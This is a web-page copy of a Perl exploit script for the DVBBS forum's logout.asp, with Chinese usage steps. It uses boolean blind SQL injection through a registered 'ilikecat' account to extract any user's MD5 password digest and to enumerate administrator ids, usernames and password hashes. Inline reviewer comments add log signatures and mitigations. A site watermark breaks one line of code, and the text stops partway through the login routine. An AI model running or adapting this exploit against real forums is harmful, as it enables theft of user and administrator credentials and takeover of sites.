获取任意用户MD5加密信息的测试程序
来源:热点网络
--------------------[获取任意用户MD5加密信息的测试程序:
#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBSs logout.asp
#--------------------------------------------------------------------------
# 本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户
# MD5加密密码;另外可以自动破解后台管理员ID、username、password
# 脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序
# 脚本利用方法:
# 1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid
# 2:再另注册一任意用户(此步不可少)
# 3:运行脚本,按帮助输入命令参数
# 如果是MSSQL版,请把这段糟糕的脚本扔到一边
#--------------------------------------------------------------------------
# Start-up: unbuffer STDOUT, parse the command line, print the banner and
# copy the options into the package globals the rest of the script reads.
# There is no "use strict" / "use warnings": every variable below is a package
# global, and barewords such as hpwium are taken as plain strings.
$|=1;   # autoflush, so progress characters appear as each probe completes
use Socket;
use Getopt::Std;
# Getopt::Std::getopt treats each listed letter as a switch that takes a
# value and stores it in $opt_h, $opt_p, $opt_w, $opt_i, $opt_u, $opt_m.
getopt(hpwium);
print " =================================================== ";
print " Exploit of DVBBSs logout.asp ";
print " Codz By PsKey<PsKey@hotmail.com> ";
print " http://www.isgrey.com/ && c4st.51.net ";
print " Thanx Envymask<130@21cn.com> ";
print " =================================================== ";
# -h, -w, -i and -m are mandatory. &usage is defined outside this excerpt;
# presumably it prints help and exits -- TODO confirm.
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));
$host=$opt_h;        # target host name; used in the Host/Referer headers built by &first
$port=$opt_p||80;    # falls back to 80 when -p is absent (or given as 0/empty)
$path=$opt_w;        # forum base path, prefixed to /login.asp in &first
$userid=$opt_i;      # not read in the visible part of the script; presumably used by a sub outside this excerpt
# NOTE(review): $user is later interpolated as-is into the URL-encoded query
# fragment of the -m p branch; no quoting or validation is applied here.
$user=$opt_u;
$mode=$opt_m;        # the dispatch below tests $opt_m directly, not $mode
# Mode dispatch: "-m p" recovers one forum user's stored password digest,
# "-m b" walks the [admin] table; any other value falls through to &usage.
#
# What the code does: boolean-based blind SQL injection. Each probe appends a
# URL-encoded "and exists (select ...) and 1=1" clause to the registered
# account name "ilikecat" and stores the result in the global $target.
# &second is defined outside this excerpt; presumably it sends $target to the
# forum and fills @in with the response -- TODO confirm. A response that does
# NOT contain "ilikecat" is treated as "the injected condition was true".
# &first (cut off at the end of this excerpt) builds a login.asp request for
# the ilikecat/catlikeme account.
#
# Reviewer notes (detection / mitigation):
#  - Log signature: bursts of near-identical requests whose username value
#    carries "%20and%20exists%20(select" together with "[user]" or "[admin]",
#    interleaved with logins as "ilikecat". The p branch makes at most
#    16 x 16 calls to &second per digest.
#  - The payload shape implies the server concatenates the cookie/parameter
#    username into a SQL string; binding it as a query parameter (or
#    rejecting anything but the expected character set) removes the oracle.
#  - The fixed 16-position loops over 0-9a-f assume a short hex digest is
#    stored (the page calls it MD5); a salted, slow password hash limits what
#    a leaked column is worth.
if ($opt_m eq "p") {
# -u (the forum user name to test) is required in this mode.
&usage unless defined($opt_u);
print " Please wait... ";
# $j is the prefix length being tested, 1..16.
for ($j=1;$j<=16;$j++) {
# Candidate alphabet 0-9a-f; rebuilt on every pass although it never changes.
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
# $pws holds the characters confirmed so far; $key is that prefix plus the
# candidate character.
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName=$user%20and%20left(UserPassword,$j)=$key)%20and%201=1";
&second;
# "@in" joins the response lines with spaces; absence of the account name
# is the "true" signal.
if ("@in" !~ /ilikecat/) {
$th=$j.th;   # bareword th: yields "1th", "2th", ...
print " //------------The $th word of the password is $dic[$i]";
$pws=$pws.$dic[$i];
last;
}
}
}
print " Successful,the full password of $user is $pws. ";
}
elsif ($opt_m eq "b") {
#Crack ID
# Stage 1: test ids 0..50 in [admin] and collect those that exist in @id.
print " ###########Start cracking admins id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
print " --------->>There is one admins id $i";
push (@id,$i);
&first;   # log in again after a hit before continuing
}
}
print " ###########End cracking admins id... ";
sleep(2);
#Crack the length of admins username
# Stage 2: for each id found, test username lengths 0..50; results go to
# @len in the same order as @id.
print " ###########Start Cracking the length of admins username... ";
for ($j=0;$j<@id;$j++) {
print " |->cracking usernames length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
print " --------->>The length of $id[$j] is $i";
# NOTE(review): the text after the semicolon on the next line is a watermark
# injected by the hosting site, not part of the author's script; as printed
# the line does not parse as Perl.
push (@len,$i);=版权所有 软件 下载 学院 版权所有=
&first;
last;
}
}
}
print " ###########End Cracking the length of admins username... ";
sleep(2);
#Crack admins username
# Stage 3: recover each username one character at a time from the
# alphabet 0-9a-z, up to the length recorded in @len.
print " ###########Start Crackadmins username... ";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";   # reused as the confirmed-prefix buffer for the username
print " |->cracking username which id is $id[$j] ...";
OUTER: for ($k=1;$k<=$len[$j];$k++) {
&first;
USERNAME: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)=$key)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print " --------->>The $th word of $id[$j] username is $dic[$i]";
$pws=$pws.$dic[$i];
last USERNAME;
}
# Last candidate reached without a hit: the character is outside 0-9a-z,
# so the script records "?" for this id and stops probing its name.
if ($dic[$i] eq "z") {
print " i cant crack this admins name,maybe it is chinese. ";
push (@user,"?");
last OUTER;
}
}
}
push (@user,$pws);
print " ========>>The username is $pws which id is $id[$j] ";
}
print " ###########End Crackadmins username... ";
sleep(2);
#Crack admins password
# Stage 4: recover 16 characters of the password column per id from the
# alphabet 0-9a-f, same prefix-extension scheme as above.
print " ###########Start Crackadmins password... ";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " |->cracking password which id is $id[$j] ...";
for ($k=1;$k<=16;$k++) {
&first;
PASSWORD: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)=$key)%20and%201=1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print " --------->>The $th word of $id[$j] password is $dic[$i]";
$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
print " ========>>The password is $pws which id is $id[$j] ";
}
print "###########End Crackadmins password... ";
# Summary table: @id, @user and @pass are read in parallel by index.
print "We got them now: ";
printf("%-4s %-20s %-16s ",ID,UserName,PassWord);   # barewords used as column headings
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s ",$id[$i],$user[$i],$pass[$i]);
}
}
else {
# Unknown -m value.
&usage;
}
sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1 ".
"Referer: http://$host$path/login.asp ".
"Host: $host ".
"Content-Length: $len ".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0;